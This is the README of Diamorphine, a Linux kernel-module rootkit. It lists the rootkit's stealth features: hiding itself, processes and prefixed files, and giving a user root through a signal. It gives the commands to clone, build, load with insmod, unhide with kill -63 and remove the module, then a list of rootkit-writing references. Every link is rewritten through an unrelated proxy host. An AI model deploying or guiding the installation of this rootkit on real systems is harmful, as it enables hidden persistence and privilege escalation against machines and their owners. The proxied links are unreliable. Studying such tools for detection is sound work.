Diamorphine is a LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x/6.x (x86/x86_64 and ARM64)
-
When loaded, the module starts invisible;
-
Hide/unhide any process by sending a signal 31;
-
Sending a signal 63(to any pid) makes the module become (in)visible;
-
Sending a signal 64(to any pid) makes the given user become root;
-
Files or directories starting with the MAGIC_PREFIX become invisible;
-
Source: https://github.com/m0nad/Diamorphine
Verify if the kernel is 2.6.x/3.x/4.x/5.x
uname -r
Clone the repository
git clone https://github.com/m0nad/Diamorphine
Enter the folder
cd Diamorphine
Compile
make
Load the module(as root)
insmod diamorphine.ko
The module starts invisible, to remove you need to make it visible
kill -63 0
Then remove the module(as root)
rmmod diamorphine
Wikipedia Rootkit https://en.wikipedia.org/wiki/Rootkit
Linux Device Drivers http://lwn.net/Kernel/LDD3/
Memset's blog http://memset.wordpress.com/
Linux on-the-fly kernel patching without LKM http://phrack.org/issues/58/7.html
WRITING A SIMPLE ROOTKIT FOR LINUX https://web.archive.org/web/20160620231623/http://big-daddy.fr/repository/Documentation/Hacking/Security/Malware/Rootkits/writing-rootkit.txt
Linux Cross Reference http://lxr.free-electrons.com/
zizzu0 LinuxKernelModules https://github.com/zizzu0/LinuxKernelModules/
Linux Rootkits: New Methods for Kernel 5.7+ https://xcellerator.github.io/posts/linux_rootkits_11/